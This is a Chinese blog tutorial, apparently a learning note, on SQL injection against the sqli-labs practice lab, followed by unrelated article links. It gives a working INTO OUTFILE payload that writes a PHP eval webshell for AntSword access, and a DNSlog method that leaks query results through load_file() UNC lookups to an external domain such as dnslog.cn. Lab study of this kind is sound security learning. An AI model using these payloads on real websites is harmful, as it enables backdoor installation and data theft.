SQL注入之(肆)

已于 2024-12-24 18:06:39 修改
阅读量2k 收藏 38
点赞数 42
文章标签: sql 数据库 学习
于 2024-12-21 21:22:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/duwgv/article/details/144571302
版权

 由于之前主学二进制方向,web方向有所落下,但现在决定双修,所以web也开始推进。

进入正题,现在该学文件写入了。虽然现在SQL注入漏洞已经不常见,但还是可以从中学到很多基础,能够拓宽知识面。

文件写入(少见),需要你的数据库有读写权限,不然是不能成功的。

可以先看一下数据库有无读写权限

在information_schema中输入show variables like '%secure%';

如果secure_file_priv后面什么都没有那么是有读写权限,如果后面是NULL是没有读写权限的。

如果没有读写权限那么先在自己装的MYSQL数据文件中找到my.ini进入

 在其中找到secure_file_priv=“NULL”

如果没有就给它加上,如图:

 然后刷新数据库,再次输入show variables like '%secure%';secure_file_priv=""就成功了。

然后就是来判断是字符型还是数字型了,发现是字符型,那它的闭合方式是什么呢?

输入?id=1'发现是正确的

输入?id=1'--+把后面的东西过滤掉发现还是正确的。这说明它不是单引号闭合。

输入?id=1"和?id=1"--+正确说明不是双引号。

一个一个试当输入?id=1')它报错,但是输入?id=1')--+它还是错的不是这种闭合

当试到?id=1'))报错并且?id=1'))--+时不报错说明是这种闭合方式。

 然后用?id=1'))group by 3--+有几列。

?id=1')) union select 1,2,3--+测试查询语句

然后是一句话木马

<?php @eval($_POST['password']);?>

?id=-1')) union select 1,2,"<?php @eval($_POST['password']);?>" into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\WOw.php"--+

其中password为预留密码,WOw.php为新插入的文件名。

然后可以用蚁剑链接,获得数据库权限。sql-libs第7关,我无法正常传入木马文件,然后发现phpstudy_pro,开Nginx服务,别开Apache不然写不进去,我是出现了这种情况。

然后发现多出一个PHP文件使用蚁剑链接就可以控制数据库了

这种注入方式知道原理即可,实战较少见。

DNS log手动注入

DNSlog注入它也算盲注的一种,但是它比普通盲注的效率高,像时间盲注和布尔盲注在特定的条件下对于WAF绕过有帮助但是效率低,大多数网络平台已经将sqlmap加入黑名单中,DNSlog注入 可以帮助我们提升效率,它通常是成组或成行的注入。

属于盲注的一种,这个也要读写权限(偏向于理论,上个题不能做这个题大概也不行这是题目的问题)

首先要知道load_file()函数,该函数可以读取本机或者网络上共享出来的文件。

用法如下

load_file()

这是我本机的E盘的一个叫ctf的txt文件。查出后显示有多少字节。

这是将文件移入note文件夹后的语句,如果写的路径不对它不会报错,但是它也不会显示字节的多少,只显示NULL。

这里还要说一下UNC路径这个概念。

UNC路径(Universal Naming Convention)是一种网络路径的命名规则,也被称为通用命名规范。‌ 它用于在网络中标识和访问文件、文件夹等资源。UNC路径的格式通常包括服务器名称、共享名称以及资源名称,例如\\ServerName\ShareName\ResourceName。‌

UNC路径的格式和用途

UNC路径的格式通常为\\ServerName\ShareName\ResourceName,其中:

  • ServerName表示服务器的名称。
  • ShareName表示共享的名称。
  • ResourceName表示共享内的资源名称,如文件夹或文件。

win+R然后输入

\\访问主机(服务器)IP\已经共享的文件名\要看的文件

用SQL语句是这样的

select load_file("//服务器IP/要访问的共享文件夹/文件名");

 以上是正常的写法下面介绍我们要学的手法

如果我们将服务器IP写成网站的域名,网站数据库自动会进行一次域名解析得到服务器的IP,在其前面加上SQL查数据库的SQL命令

select load_file("//(select database())+.+域名/要访问的共享文件夹/文件名");

注意中间的那个“.”这是个拼接符, 将查询语句和域名拼接在一起时,就会先执行查库命令,当然我们不会去关心后面的要访问的文件能不能成功,我们只关心它的查询语句能不能查出东西,然后查出东西怎么看到。

我们需要看到DNS解析日志

这里有个网站http://www.dnslog.cn/

这个要API,但个人使用推荐http://ceye.io

以sqli-labs靶场中的题为例

访问1p3nrg.dnslog.cn并在该网站中查到DNS日志

 可以看到数据库名

 注意查表名时要在后面加上limit函数控制输出的内容。

还有就是为什么要用concat函数,因为将查询语句直接放进去是无法执行,需要concat进行拼接。

然后剩下的依旧是原来那些查询命令。

duwgv
关注
从零至壹上贰弃叁得之综合渗透贯穿始终
战神/calmness的博客
01-03 668
描述 题目的意思是从0开始进行外网的渗透测试到达壹;之后进行内网漫游属于贰;应急响应是叁,应急响应中摒弃病毒、木马文件等,之后进行追踪溯源的操作,获取黑客信息属于;其次就是后期的运营方面的建设; 进行从开始的环境搭建步步紧跟,资料的查询,不断地思考,提升内在解决问题的能力;从而构造安全建设的内外体系的形成; 思路 kali 首先攻击win7【CMS】-横向移动发现win10和win2008-攻击域控win2012-拿下域控权限-进行应急响应去处置-之后溯源-找到黑客信息进行封杀-后期进行安全运营建
SQl注入-进阶篇
BoomJane的专栏
08-23 1423
【一、SQL注入的基本步骤】 首先,判断环境,寻找注入点,判断数据库类型。 其次,根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种: (1)数字型 比如,ID=49 这类注入的参数,SQL语句原貌大致如下: Select * from 表名 where 字段=49 注入的参数为ID=49 And [查询条件],即是生成语句: Select *
SQL注入详解(第二章手工注入
m0_52051132的博客
09-17 2855
mysql中存在4个控制权限的表,分别为user表,db表,tables_priv表,columns_priv表,我当前的版本mysql 5.7.22。mysql权限表的验证过程为:先从user表中的Host,User,Password这3个字段中判断连接的ip、用户名、密码是否存在,存在则通过验证。通过身份认证后,进行权限分配,按照user,db,tables_priv,columns_priv的顺序进行验证。
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
jasonOI的博客
12-10 1510
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
SQL注入学习总结
重庆森林不在重庆的博客
10-08 1576
为探讨清楚SQL注入的诸多细节,作者对学习过程进行了全面、详细、系统的总结,形成了本文。本文是经由sqli-labs训练总结而来,配合作者的sqli-labs通关全详解食用更佳(怎么可以光学习不训练呢)。
玩转SQL注入,想零基础入门到精通(超详细),收藏这一篇就够了
2402_84205067的博客
11-20 750
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
SQL注入实战经验总结
03-17
怎么找注入点,注入思路总结,注入完整过程细节
网络渗透测试实验三:SQL注入
最新发布
2301_79456294的博客
12-31 884
在本次实验中,我们研究了两种常见的Web安全漏洞——SQL注入。首先确认了存在SQL注入漏洞的位置,然后逐步探索了数据库的信息,包括数据库名、用户名、密码以及表结构等。这个过程不仅让我们理解了SQL注入的基本原理,还掌握了sqlmap这一强大工具的具体用法。打开Metasploitable2后,里面有搭建好的DVWA,访问http://自己tasploitable的IP/dvwa (先扫描一下内网的ip,确定Metasploitable2的ip地址)掌握程序设计中避免出现SQL注入漏洞的基本方法;
sql和pb常用自己收藏的代码
06-23
1. **查询语句(SELECT)**:SQL的核心功能是查询数据,包括基础的SELECT语句以及与之相关的联接(JOIN)、分组(GROUP BY)、聚合函数(SUM, COUNT, AVG等)和排序(ORDER BY)。 2. **子查询**:在主查询中嵌套一...
SQL Server 2000 JDBC连接必用的三个关键Jar包
- msbase.jar是早期版本的Microsoft SQL Server JDBC驱动程序的一部分,包含了基础的JDBC功能,通常被用作驱动程序的底层组件之一。虽然它不是连接数据库所必需的,但是在某些情况下,它可能需要与其他驱动程序组件...
系列2:5、sql注入之高权限注入
qq_44704184的博客
03-25 4145
sql注入之高权限注入数据库中区分有数据库系统用户与数据库**普通用户,**二者的划分主要体现在对一些高级函数与资源表的访问权限上。直白一些就是高权限系统用户拥有整个数据库的操作权限,而普通用户只拥有部分已配置的权限。 网站在创建的时候会调用数据库链接,会区分系统用户链接与普通用户链接;当多个网站存在一个数据库的时候.root就拥有最高权限可以对多个网站进行管辖,普通用户仅拥有当前网站和配置的部分权限。所以当我们获取到普通用户权限时,我们只拥有单个数据库权限,甚至文件读写失败;取得高权限用户权限,不仅可
Web安全 SQL注入漏洞 工具测试.
网络安全领域___专研者.
02-13 7245
SQL注入就是 有些恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容中,同时程序的本身对用户输入的内容过于相信,没有对用户插入的SQL语句进行任何的过滤,从而直接被SQL语句直接被服务端执行,导致数据库的原有信息泄露,篡改,甚至被删除等风险。
SQL注入实战---利用“dbo”获得SQL管理权限和系统权限
巅峰测试
08-03 1176
在一个供求信息发布的网站上测试了一下,页面http://www.xxx.com/new/new.asp?id=49我做了如下测试:(1) http://www.xxx.com/new/new.asp?id=49’Microsoft OLE DB Provider for ODBC Drivers 错误 80040e14[Microsoft][ODBC Microsoft Access Dri
SQL注入一句话木马(load_file/out file)
初学者L_言的博客
11-26 9306
工具 靶机——metasploitable2 环境——DVWA,(low等级下) 菜刀——蚁剑 权限查看 查看mysql是否有对函数load_file(),outfile()函数的限制 (securefilepriv的值是否为NULL) show global variables like '%secure%'; NULL 表示不可用, 空 表示可用 ' order by 2-- 查看字段...
Sql注入_mysql权限入侵
weixin_30342827的博客
03-22 555
实验:测试不同数据库用户的操作权限 文件读写测试:load_file() ,into outfile 数据库用户账号密码存储在mysql.user下 Mysql最高权限用户root: Mysql普通权限用户test: 无权限文件读写 注入数据库用户权限由什么决定? 连接数据库用户决定 Mysql注入点进行文件读写操作: 条件:root权限注入...
网站SQL注入语句分析 如何盗取网站管理权限
cleble的专栏
01-19 8676
我们知道网站后台需要验证用户的输入, 如果不这样做, 用户甚至可以输入一些SQL语句操作后台的数据库, 这么好玩的事情一直没有真正体验过. 前几日学校搞了一个"你最喜欢的辅导员"投票活动, 网站估计是给某个学生团队做的, 结果经同学破解了这个网站的管理员帐号和密码, 我遂向他请教了原理, 也了解了他破解的步骤, 自己又实践了一遍. 感谢经同学, 没有他我就不知道这些, 也不可能有这篇博客. 
SQL注入知识点详解
qq_44857938的博客
06-19 1287
SQL注入 大家好,我又来了,这回给大家分享一下自己总结的sql注入学习笔记,sql注入是一个极为重要的漏洞,可能博主总结的有所缺陷,希望大家多多补充,大家一起进步,好了,闲话少扯,直接上干货。 1.SQL注入介绍 SQL注入攻击就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。 (1)造成SQL注入的原因 程序开发过程中不注意书写规范,对sql语句和关键字过滤不严格,导致客户端可以通过全局性变量get或者post提交sql语句到服务器端正常运行。
利用 SQL 注入修改目录权限
Kane 's Blog [A.D.K]
01-04 1927
注入拥有sa权限,提升webshell权限! Cacls显示或修改指定文件上的随机访问控制列表 (DACL)。语法cacls FileName [/t] [/e [/r User [...]]] [/c] [/g User:Permission] [/p User:Permission [...]] [/d User [...]]参数FileName 必需
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值